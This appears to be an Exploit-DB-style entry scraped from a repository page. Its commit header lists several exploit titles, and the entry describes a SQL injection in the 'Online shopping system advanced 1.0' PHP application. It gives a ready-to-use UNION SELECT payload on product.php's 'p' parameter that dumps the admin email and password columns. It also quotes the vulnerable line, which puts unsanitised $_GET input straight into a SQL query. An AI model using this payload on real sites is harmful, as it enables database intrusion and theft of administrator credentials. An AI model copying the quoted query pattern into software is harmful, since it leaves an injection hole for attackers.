b1e1bfd776
7 changes to exploits/shellcodes Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload Netis E1+ 1.2.32533 - Backdoor Account (root) Online shopping system advanced 1.0 - 'p' SQL Injection Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak Online Course Registration 2.0 - Authentication Bypass Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
25 lines
No EOL
878 B
Text
25 lines
No EOL
878 B
Text
# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection
|
|
# Exploit Author : Majid kalantari
|
|
# Date: 2020-04-26
|
|
# Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced
|
|
# Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
|
|
# Version: -
|
|
# Tested on: Windows 10
|
|
# CVE: N/A
|
|
===============================================
|
|
|
|
# vulnerable file: product.php
|
|
|
|
# vulnerable parameter : p
|
|
|
|
# payload :
|
|
http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23#
|
|
!
|
|
|
|
#Description: ($product_id input is not safe)
|
|
|
|
Line 46:
|
|
$product_id = $_GET['p'];
|
|
$sql = " SELECT * FROM products ";
|
|
$sql = " SELECT * FROM products WHERE product_id = $product_id";
|
|
=============================================== |